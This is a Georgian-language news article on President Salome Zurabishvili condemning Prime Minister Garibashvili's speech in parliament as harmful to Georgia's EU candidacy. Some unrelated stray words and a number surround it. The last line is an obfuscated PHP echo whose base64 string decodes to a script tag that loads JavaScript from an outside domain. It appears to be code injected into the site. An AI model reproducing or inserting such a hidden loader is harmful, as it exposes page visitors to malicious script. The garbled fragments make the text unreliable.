celsiusi
ავერსი შნაიდერი
საქართველოს პრეზიდენტი სალომე ზურაბიშვილი აღშფოთებულია ირაკლი ღარიბაშვილის დღევანდელ გამოსვლით პარლამენტში, რომელის სავსე იყო ზიზღითა და სიძულვილის ენით. ამის შესახებ მან განცხადება საგანგებო ბრიფინგზე გააკეთა.
 
"ის, რაც ჩვენ ვნახეთ ორშაბათს, ნამდვილად იყო თავისუფალი გამოხატულება ჩვენი საზოგადოების და იყო ის, რასაც გადავეჩვიეთ და რასაც გვთხოვს ევროპა- იყო ერთიანობა. სამწუხაროდ, დღეს ვნახეთ მეორე სახე - მე ვარ სრულიად შეშფოთებული იმისა, თუ რა მოვისმინე დღეს პარლამენტში.
 
რაც დავინახეთ პარლამენტში არის საწინააღმდეგო იმისი, რაც აჩვენა საზოგადოებამ. საზოგადოებამ აჩვენა - თავშეკავება, ზრდილობა, ერთმანეთის პატივისცემა, პარლამენტმა აჩვენა საპირისპირო - დაპირისპირება, ლანძღვა, ერთმანეთის გაუტანლობა, ყველაფერი რაც შეიძლებოდა გვეჩვენებინა ჩვენი უარყოფითი სახის შესახებ, ვაჩვენეთ დღეს
 
ამას დაემატა პრემიერის გამოსვლა, რომელიც თუ რამე გამოსვლა შეიძლებოდა ყოფილიყო, რომელიც გააგზავნიდა ბრიუსელისკენ ნეგატიურ გზავნილს, რომ ჩვენ თურმე ყველაზე კარგები ვართ, ყველაფერი კარგად გავაკეთეთ, არაფერი არ გვიჭირს, ვართ ბევრად უკეთესები, ვიდრე თქვენი უკრაინა და თქვენი მოლდოვა, ვერ გავიგეთ რატომ ისინი არიან ჩვენზე წინ, ერთადერთი ალბათ იმიტომ, რომ თქვენ ომი გინდოდათ და ჩვენ ომი არ გვინდა, ანუ, აბსურდი და ძალიან შეურაცხმყოფელი თავისი შინაარსით." – თქვა ზურაბიშვილმა.  
 
ზურაბიშვილის განცხადებით, მაშინ, როცა პარტნიორებისგან ისეთ მნიშვნელოვან გადაწყვეტილებას ელოდება ქვეყანა, როგორც 24 რიცხვში უნდა გამოცხადდეს, ხელისუფლებას 2 რამ მოეთხოვება - გაიგოს ხალხის ხმა და გაიგოს პარტნიორები რას ელოდებიან მისგან.
 
"ისინი ელოდებოდნენ ძალიან მარტივ რამეს- გამოთქმულიყო პოლიტიკური ნება, რომ კი, ჩვენ წავიკითხეთ რეკომენდაციები, ამას გავაანალიზებთ, ეს არ ნიშნავს, რომ ყველაფერს თავისთავად მივიღებთ, მაგრამ მზად ვართ, ყველამ ერთად ყველაფერი გავაკეთოთ იმისთვის, რომ წლის ბოლოს შევასრულოთ ის, რაც არის ჩვენს მიმართ გზავნილი - თუ გადადგამთ რამდენიმე ნაბიჯს მაინც და პოლიტიკური ნება გამოჩნდება, თქვენც მიიღებთ კანდიდატის სტატუსს." თქვა სალომე ზურაბიშვილმა თავის გამოსვლაში. 
 
 
467
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");